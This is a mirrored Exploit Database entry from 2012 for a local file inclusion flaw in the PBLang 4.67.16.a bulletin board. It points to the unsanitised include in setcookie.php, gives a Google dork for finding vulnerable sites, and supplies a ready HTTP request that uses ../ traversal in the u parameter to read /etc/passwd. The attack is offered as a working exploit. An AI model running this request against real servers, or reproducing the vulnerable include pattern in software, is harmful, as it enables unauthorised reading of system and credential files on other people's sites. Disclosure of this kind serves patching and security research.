PBLang Bulletin Board System – Local File Inclusion

• Exploit Database
• 51 阅读

• 作者： Number 7
  日期： 2012-03-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18590/

• ||\\|| || || |-\\//-|____________ __________
  || \\ || || || | |\\//| | | \ |______| |_______/ /
  ||\\|| || || | | \\// | | |_ \| | / /
  || \\ || || || | |\\//| | | |_)|| |______/\`'__\ / /
  ||\\|| || || | | \\// | | |_< |______| \ \ \/ / /
  || \\ || ||_______|| | |\\//| | | |_)|| |______ \ \_\/ /
  ||\\|| |_________| |_||_| |_____/ |________| \/_/ /_/
  ______________________________________________________________________________________
  # Exploit Title:[PBLang local file include vulnerability]
  # Google Dork:["Software PBLang 4.67.16.a"]
  # Date: [12/03/2012]
  # Author: ~Pseudo:[Number 7];
  ~ Twitter:[@TunisianSeven];
  ~ Blog: [http://tunisianseven.blogspot.com/]
  # Software Link:[http://garr.dl.sourceforge.net/project/pblang/Full%20versions/PBLang%204.67.16.a%20no%20graphics/PBLang-4.67.16.a-nographics.zip]
  # Version:[4.67.16.a]
  # Tested on:[wINDOWS,Linux]
  ______________________________________________________________________________________
  Proof of concept:
  In setcookie.php
  include($dbpath."/members/".$u);
  
  In order to successfully perform this attack the attacker must have
  the full path where the files are uploaded, and it is easy to get
  making a request like this:
  
  GET http://localhost/path/setcookie.php?u=../../../../../etc/passwd HTTP/1.1
  Cookie: eXtplorer=eRlQPZSWiGt2zRpFlXr6qCgja6DiLumU
  Host: localhost:80
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
  
  For requests like this i use acunetix :D
  ______________________________________________________________________________________